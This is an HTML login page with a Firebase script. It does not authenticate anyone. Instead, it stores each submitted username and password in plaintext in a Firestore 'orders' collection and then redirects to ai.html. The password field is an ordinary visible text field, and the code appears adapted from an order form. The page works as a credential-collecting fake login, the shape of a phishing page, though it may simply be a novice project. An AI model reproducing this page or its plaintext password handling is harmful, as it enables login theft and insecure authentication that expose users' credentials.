<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>login </title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="img-container">
        <img src="https://i.ibb.co/N6KXj5yh/Screenshot-2026-07-14-143022.png" alt="logo" style="width: 150px; margin-bottom: 20px;">
    </div>
    <div class="form-container">
        
        <form id="orderForm">
            <input type="text" id="username" placeholder="user Name" required>
            <input type="text" id="password" placeholder="password" required>
            <button type="submit">login</button>
        </form>
    </div>

    <script type="module">
        import { db } from './config.js';
        import { collection, addDoc } from "https://www.gstatic.com/firebasejs/10.7.1/firebase-firestore.js";

        document.getElementById('orderForm').addEventListener('submit', async (e) => {
            e.preventDefault();
            
            const name = document.getElementById('username').value;
            const phone = document.getElementById('password').value;
           

            try {
                // Firebase la save pandrom
                await addDoc(collection(db, "orders"), {
                    username: name,
                    password: phone,
                    timestamp: new Date()
                });
                
                // Submit aana udaney ai.html ku pogum
                window.location.href = "ai.html";
                
            } catch (error) {
                console.error("Error: ", error);
                alert("Order failed!");
            }
        });
    </script>
</body>
<div class="footer-set">
    <div class="section-divider"></div>
    <div class="footer-text">
        Don't have an account? <a href="#">Sign up</a>
    </div>
</div>

</body>
</html>